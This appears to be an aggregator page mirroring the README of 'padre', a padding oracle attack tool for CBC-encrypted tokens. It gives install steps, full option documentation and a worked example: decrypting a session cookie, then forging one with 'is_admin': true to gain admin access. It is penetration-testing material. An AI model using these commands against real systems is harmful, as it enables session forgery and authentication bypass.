All Projects → glebarez → padre

glebarez / padre

Licence: other
Blazing fast, advanced Padding Oracle exploit

Programming Languages

go
31211 projects - #10 most used programming language
python
139335 projects - #7 most used programming language

Projects that are alternatives of or similar to padre

prl guest to host
Guest to host VM escape exploit for Parallels Desktop
Stars: ✭ 26 (-25.71%)
Mutual labels:  exploit
Net-Core-JS-Encryption-Decryption
A library to encrypt / decrypt with AES (Rijndael) between C# Net Core and JavaScript and securely hash with Scrypt
Stars: ✭ 17 (-51.43%)
Mutual labels:  aes
exploit
Collection of different exploits
Stars: ✭ 153 (+337.14%)
Mutual labels:  exploit
hack
Kubernetes security and vulnerability tools and utilities.
Stars: ✭ 56 (+60%)
Mutual labels:  exploit
CTF
CTF binary exploit code
Stars: ✭ 37 (+5.71%)
Mutual labels:  exploit
hacker-scripts
⛷ A collection of hacker scripts.
Stars: ✭ 29 (-17.14%)
Mutual labels:  exploit
ProxyLogon
ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell)
Stars: ✭ 112 (+220%)
Mutual labels:  exploit
osx-callhistory-decryptor
macOS (incl big sur) call history decryptor/converter to CSV format.
Stars: ✭ 19 (-45.71%)
Mutual labels:  aes
Rijndael256
AES cryptographic library for .NET Framework and .NET Core
Stars: ✭ 33 (-5.71%)
Mutual labels:  aes
CVE-2019-10149
CVE-2019-10149 : A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.
Stars: ✭ 15 (-57.14%)
Mutual labels:  exploit
CamOver
CamOver is a camera exploitation tool that allows to disclosure network camera admin password.
Stars: ✭ 217 (+520%)
Mutual labels:  exploit
vulristics
Extensible framework for analyzing publicly available information about vulnerabilities
Stars: ✭ 46 (+31.43%)
Mutual labels:  exploit
Scripts-Sploits
A number of scripts POC's and problems solved as pentests move along.
Stars: ✭ 37 (+5.71%)
Mutual labels:  exploit
webcrypto
A WebCrypto Polyfill for NodeJS
Stars: ✭ 111 (+217.14%)
Mutual labels:  aes
RootMyTV.github.io
RootMyTV is a user-friendly exploit for rooting/jailbreaking LG webOS smart TVs.
Stars: ✭ 745 (+2028.57%)
Mutual labels:  exploit
tinyaes-py
tiny-AES-c wrapper in Cython
Stars: ✭ 33 (-5.71%)
Mutual labels:  aes
apple-knowledge
A collection of reverse engineered Apple things, as well as a machine-readable database of Apple hardware
Stars: ✭ 338 (+865.71%)
Mutual labels:  exploit
spellbook
Framework for rapid development and reusable of security tools
Stars: ✭ 67 (+91.43%)
Mutual labels:  exploit
abrute
Multi-threaded AES Brute Force File Decryption
Stars: ✭ 22 (-37.14%)
Mutual labels:  aes
Exploits
A personal collection of Windows CVE I have turned in to exploit source, as well as a collection of payloads I've written to be used in conjunction with these exploits.
Stars: ✭ 75 (+114.29%)
Mutual labels:  exploit

Publish release

padre

padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption

Features:

  • blazing fast, concurrent implementation
  • decryption of tokens
  • encryption of arbitrary data
  • automatic fingerprinting of padding oracles
  • automatic detection of cipher block length
  • HINTS! if failure occurs during operations, padre will hint you about what can be tweaked to succeed
  • supports tokens in GET/POST parameters, Cookies
  • flexible specification of encoding rules (base64, hex, etc.)

Demo

demo

Installation/Update

  • Fastest way is to download pre-compiled binary for your OS from Latest release

  • Alternatively, if you have Go installed, build from source:

go get -u github.com/glebarez/padre

Usage scenario

If you find a suspected padding oracle, where the encrypted data is stored inside a cookie named SESS, you can use the following:

padre -u 'https://target.site/profile.php' -cookie 'SESS=$' 'Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg=='

padre will automatically fingerprint HTTP responses to determine if padding oracle can be confirmed. If server is indeed vulnerable, the provided token will be decrypted into something like:

 {"user_id": 456, "is_admin": false}

It looks like you could elevate your privileges here!

You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:

padre -u 'https://target.site/profile.php' -cookie 'SESS=$' -enc '{"user_id": 456, "is_admin": true}'

This will spit out another encoded set of encrypted data, perhaps something like below (if base64 used):

dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Now you can open your browser and set the value of the SESS cookie to the above value. Loading the original oracle page, you should now see you are elevated to admin level.

Impact of padding Oracles

  • disclosing encrypted session information
  • bypassing authentication
  • providing fake tokens that server will trust
  • generally, broad extension of attack surface

Full usage options

Usage: padre [OPTIONS] [INPUT]

INPUT: 
	In decrypt mode: encrypted data
	In encrypt mode: the plaintext to be encrypted
	If not passed, will read from STDIN

	NOTE: binary data is always encoded in HTTP. Tweak encoding rules if needed (see options: -e, -r)

OPTIONS:

-u *required*
	target URL, use $ character to define token placeholder (if present in URL)

-enc
	Encrypt mode

-err
	Regex pattern, HTTP response bodies will be matched against this to detect padding oracle. Omit to perform automatic fingerprinting

-e
	Encoding to apply to binary data. Supported values:
		b64 (standard base64) *default*
		lhex (lowercase hex)

-r
	Additional replacements to apply after encoding binary data. Use odd-length strings, consiting of pairs of characters <OLD><NEW>.
	Example:
		If server uses base64, but replaces '/' with '!', '+' with '-', '=' with '~', then use -r "/!+-=~"

-cookie
	Cookie value to be set in HTTP requests. Use $ character to mark token placeholder.

-post
	String data to perform POST requests. Use $ character to mark token placeholder. 

-ct
	Content-Type for POST requests. If not specified, Content-Type will be determined automatically.
	
-b
	Block length used in cipher (use 16 for AES). Omit to perform automatic detection. Supported values:
		8
		16 *default*
		32

-p
	Number of parallel HTTP connections established to target server [1-256]
		30 *default*
		
-proxy
	HTTP proxy. e.g. use -proxy "http://localhost:8080" for Burp or ZAP

Further read

Alternative tools

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].